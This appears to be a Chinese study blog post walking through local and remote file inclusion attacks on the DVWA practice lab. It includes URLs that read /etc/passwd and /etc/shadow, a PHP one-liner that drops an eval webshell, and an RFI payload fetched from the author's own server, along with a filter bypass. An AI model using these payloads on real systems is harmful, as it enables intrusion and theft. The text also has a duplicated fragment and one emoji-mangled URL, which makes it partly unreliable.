渗透学习-文件包含

文件包含

本地文件包含-低级

访问本地系统账号信息及其他敏感信息

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/passwd

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/shadow

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/php5/apache2/php.ini

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/mysql/my.cnf

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf

http://192.168.1.105/dvwa/robots.txt

需要一定运维能力才能找到敏感文件,这些目录仅限于靶机里位置

本地文件包含+webshell

1.制作一句话木马 e.g.monkey.jpg

<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[pengge]);?>')?>

密码就叫pengge

用这个软件打开输入代码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1mHfDIYK-1587987615119)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427181531743.png)]

2、将图片上传到网站,并且查看是否成功上传

提示:

上传路径:http://192.168.1.105/dvwa/vulnerabilities/upload/

包含路径:http://192.168.1.105/dvwa/vulnerabilities/fi

//生成的PHP文件位置,即shell20.php

3、执行文件包含并生成后门

相对路径:http://192.168.1.105/dvwa/vulnerabilities/fi/?page=…/…/hackable/uploads/1.jpg

绝对路径:http://192.168.1.105/dvwa/vulnerabilities/fi/?page=var/www/dvwa/hackable/uploads/1.jpg

成功效果图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S433gxWG-1587987615123)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427183500615.png)]

再用菜刀连接获取shell

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0nRvnaOk-1587987615126)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427184313182.png)]

尝试添加文件,删除文件,看是否有权限

本地文件包含-中级

同上,查看源代码可以发现没影响,只是会将"http:"或者“https:“换为空格

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cQfWzvwN-1587987615131)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427191341967.png)]

本地文件包含-高级

 <?php
        
    $file = $_GET['page']; //The page we wish to display 

    // Only allow include.php
    if ( $file != "include.php" ) {
        echo "ERROR: File not found!";
        exit;
    }
        
?> 

可以看出只能允许include.php。所以不行

远程文件包含+webshell

1、建立远程服务器,本项目使用kali作为远程服务器

#service apache2 start
#vim /var/www/html/pengge.txt
<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[pengge]);?>')?>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ACC6enIh-1587987615136)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427185413635.png)]

然后vim编辑器在/var/www/html下建立pengge.txt

在主机上访问

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vszm50g7-1587987615139)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190141590.png)]

然后执行文件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fUHSQLEv-1587987615141)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190220973.png)]

看起来没效果,但进入能发现已经生成了shell20.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QyjK52Xi-1587987615143)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190338319.png)]

再用菜刀连接

略去过程了,如上面连接所示

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-e98zLh9g-1587987615146)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190808562.png)]

远程文件包含-中级

这个就有影响了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LUMNBWyb-1587987615149)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427191341967.png)]

所以我们可以将路径改为

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=httphttp://😕/192.168.1.103/pengge.txt

b-1587987615149)]

所以我们可以将路径改为

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=httphttp://😕/192.168.1.103/pengge.txt

后台把http://换为空后就是正常的地址

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值